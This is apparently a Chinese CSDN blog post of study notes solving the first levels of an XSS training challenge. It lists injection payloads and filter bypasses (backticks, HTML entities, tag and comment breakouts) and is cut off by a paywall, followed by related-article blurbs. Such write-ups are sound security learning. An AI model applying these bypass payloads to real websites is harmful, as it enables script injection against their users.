学习笔记——今天突然迷上了xss2

最新推荐文章于 2024-04-06 07:54:54 发布

一身傲娇命.

最新推荐文章于 2024-04-06 07:54:54 发布

阅读量218

点赞数

本文链接：https://blog.csdn.net/qq_44952118/article/details/107617871

版权

这篇博客详细记录了作者在解决一系列XSS挑战中的经历，包括使用反引号、HTML编码、换行符等绕过过滤机制的方法，并探讨了如何在特定环境下构造有效payload，通过在SegmentFault网站创建笔记并利用raw文件实现JavaScript执行。

摘要由CSDN通过智能技术生成

XSS Challenges：地址

0x00

<script>alert(1)</script>

0x01

</textarea><script>alert(1)</script>

0x02

"><script>alert(1)</script><img src="

0x03

括号被过滤，用反引号绕过

<script>alert`1`</script>

0x04

function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

括号和反引号都被过滤，所以要想办法，可以用html编码绕过

<img src="x" onerror="alert&#40;1&#41;">

0x05

--!><script>alert(1)</script>

0x06

要绕过一个正则将js代码插入到html标签中

function render (input) {
  i

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

一身傲娇命.

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

【第七周作业】XSS2

weixin_44722125的博客

04-19

260

W3school在线教程 http

2.XSS漏洞（获取用户的cookie）——小白笔记——DVWA

qwsn

11-17

2466

0x01：用户的cookie 1.cookie：在浏览器端存储用户身份信息的一种机制 2.用户信息包含：用户名和密码（经过加密处理保存在cookie里） 0x02：检测实例1 1.检测1： <script>alert('hack u')</script> //检测 2.检测2： <script>for(var i=0;i<100000;i...

参与评论您还未登录，请先登录后发表或查看评论

XSS (2)

qq_41007744的博客

05-15

592

XSS利用方式Cookie窃取攻击XSS攻击中最常见的应用方式之一cookie的操作通过Document对象访问Cookie。若要创建一个Cookie，只要将特定格式的字符串赋给document.cookie常见cookie属性：Domain——设置关联cookie的域名 Expires——通过给定一个过期时间来创建一个持久化Cookie HttpOnly——用于避免cookie被JavaScri...

浅谈XSS(二)

bluesky

06-21

183

前面我们说到了反射性XSS的发掘，里面涉及了很多javascript的东西，也许有些孩童们看不懂里面的代码到底是什么回事。今天，我们就来认识一下什么是javascript。首先说之前要说明一点，javascript和Java半毛钱关系都没有，不要认为有一个Java就和Java有关，Javascript是一种由Netscape的LiveScript发展而来的一种客户端脚本语言。在jav...

portswigger靶场 XSS2

Looooood的博客

02-28

1351

portswigger靶场记录

【应用安全之xss二】xss攻击介绍和防范（前端）

qq_35789269的博客

04-07

3429

本文我们会讲解 XSS ，主要包括： XSS 攻击的介绍 XSS 攻击的分类 XSS 攻击的预防和检测 XSS 攻击的总结 XSS 攻击案例 XSS 攻击的介绍在开始本文之前，我们先提出一个问题，请判断以下两个说法是否正确： XSS 防范是后端 RD（研发人员）的责任，后端 RD 应该在所有用户提交数据的接口，对敏感字符进行转义，才能进行下一步操作。所有要插入到页面上的数据，都要通过一个敏感字符过滤函数的转义，过滤掉通用的敏感字符后，就可以插入到页面中。如果你还不能确定答案，那么可以带

WEB渗透学习笔记6——XSS漏洞

林林木林林L的博客

07-29

544

XSS——跨站脚本漏洞跨站脚本（Cross-Site Scripting），简称为XSS或CSS或跨站脚本攻击，是一种针对网站应用程序的安全漏洞攻击技术，是代码注入的一种。它允许恶意用户将代码注入网页，其他用户在浏览网页时就会受到影响。恶意用户利用XSS代码攻击成功后，可能得到很高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。可以用于钓鱼攻击，挂马，cookie获取，前端js挖矿等攻击行为，而且广泛适用于和其他漏洞结合，达到攻击服务器的目的防范： 1.对所有不可信的输入数据进

WEB漏洞测试——HTML注入及XSS注入

勇敢( ఠൠఠ )，不怕困难

07-15

4100

HTML注入原理目前我们所接触展示页面基本上都是由html来实现的，那么后台在处理内容的时候，是对html很少处理的，如果用户刻意通过输入框、文本框、查询框来填写html、js代码（脚本注入），那么就会造成漏洞，若填写恶意网站，病毒网站,这样是很恐怖的。举个栗子新建项目标题中添加html标签注入测试结果：真的变成了一个链接点击这个连接可以跳转过去，如果不是百度的连接，而是恶意网站呢功能快捷键撤销：Ctrl/Command + Z 重做：Ctrl/Command + Y 加粗：Ctrl/C

XSS攻击(2), XSS分类, 测试方法, 防御方法, 绕过方法

探测???

10-18

2092

例如，如果一个论坛的帖子内容没有经过适当的过滤和转义，攻击者可以发布一个带有恶意脚本的帖子，当其他用户查看该帖子时，恶意脚本会在他们的浏览器中执行。对于XSS的不同类型，使用的渗透测试方法可能会有所不同。：与反射型XSS相似，尝试插入恶意载荷，但在这里，您希望这些载荷能够被存储并在后续的请求中再次呈现给用户。：查找应用程序中的所有地方，可以提交数据并在其他地方再次显示这些数据，例如评论、论坛帖子、用户资料等。恶意脚本被存储在目标服务器上（例如，数据库中），当其他用户访问某些页面时，脚本会被加载并执行。

xss漏洞简单案例

weixin_59280309的博客

07-29

3229

xss漏洞简单案例。svg 命名空间

XSS攻击打靶

weixin_53449954的博客

07-06

246

从服务器端得到stripbracketsRe的作用是将指定的符号替换，这里替换的是()，所以正常使用alert（）是不可取的。这道题过滤了script等标签，>等符号也过滤了，但是html语句会对...>进行补齐，再在结尾通过回车绕过<article>标签。这道题将“转义防止将前面函数闭合，但是输入\进行转义，这样就可以通过”进行闭合，再输入alert，再注释掉后面就好了。这道题对很多符号进行了转义，但是不干涉识别，所以我们只需要将前面的闭合后插入恶意代码再将后面的字符注释掉就可以了。

xss靶场、xss，2024年网络安全开发陷入饱和

最新发布

m0_61549674的博客

04-06

932

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。

XSS 之 haozi me 题解——人生第一份CSDN题解

Mr_Fmnwon的博客

08-05

721

XSS 靶场：xss.haozi.me 认真写的第一篇WP，以此总结，以此自勉

xss绕过字符过滤_Xss小游戏通关秘籍

weixin_39758712的博客

12-01

536

原创： Kale 合天智汇原创投稿活动：https://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ题记最近发现一个xss的攻防网站，界面很有意思，很适合寓教于乐。于是玩了一下午，特此记录下来！xss姿势众多，所以每关也只是给了一部分示例！知识前导什么是XSS？XSS 或者说跨站脚本是一种 We...

xss-demon靶场通关payload

weixin_51339377的博客

04-05

1287

xss学习

doraemon12345的博客

05-27

329

学习小结 - 一般做题思路就是闭合题目给出的函数来完成我们的弹窗 - 反引号可以替换圆括号 - <svg>标签中可以直接执行实体字符。 <svg><script>alert(1)</script> - 换行可以绕过正则 - 可以利用onclick，onmouseover等事件进行弹窗如：onclick=alert(1),onmouseover=alert(1) - 可以用换行来绕过“/ /” - 和&

小迪XSS靶场练习笔记

n5xxxx__zy的博客

07-11

3092

项目：https://github.com/haozi/xss-demo 地址：https://xss.haozi.me ## 0x00 function render (input) { return '<div>' + input + '</div>' } 没有丝毫的过滤，且在<div>标签中很简单直接写payload ...

XSS挑战平台

The Road Of Sec

01-24

2698

xss练习项目：https://github.com/haozi/xss-demo 地址：https://xss.haozi.me 自带alert(1)的js地址：https://xss.haozi.me/j.js 题解： 0x00 没有丝毫的过滤措施，且最后的输出位置在标签中，所以很简单，随便甩一个xss payload function render (input) { return '...